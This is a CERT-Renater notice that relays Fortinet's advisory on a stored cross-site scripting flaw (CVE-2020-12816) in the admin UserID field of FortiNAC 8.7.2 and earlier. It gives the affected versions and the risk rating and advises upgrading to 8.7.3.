====================================================================

                             CERT-Renater

                 Note d'Information No. 2020/VULN536
_____________________________________________________________________

DATE                : 24/09/2020

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running FortiNAC versions prior to 8.7.3.

=====================================================================
https://fortiguard.com/psirt/FG-IR-20-002
_____________________________________________________________________


XSS vulnerability in the UserID of Admin Users in FortiNAC

IR Number : FG-IR-20-002

Date      : Sep 23, 2020

Risk      : 3/5

Impact    : Unauthorized code execution

CVE ID    : CVE-2020-12816


Summary

An improper neutralization of input vulnerability in FortiNAC may allow
a remote authenticated attacker to perform a stored cross site scripting
attack (XSS) via the UserID of Admin Users.


Impact

Unauthorized code execution


Affected Products

FortiNAC version 8.7.2 and below.


Solutions

Please upgrade to FortiNAC 8.7.3 or above.


Acknowledgement

Fortinet is pleased to thank Johnatan Camargo from Itau Unibanco for
reporting this vulnerability under responsible disclosure.


=========================================================
+ CERT-RENATER       |    tel : 01-53-94-20-44          +
+ 23/25 Rue Daviel   |    fax : 01-53-94-20-41          +
+ 75013 Paris        |    email:cert@support.renater.fr +
=========================================================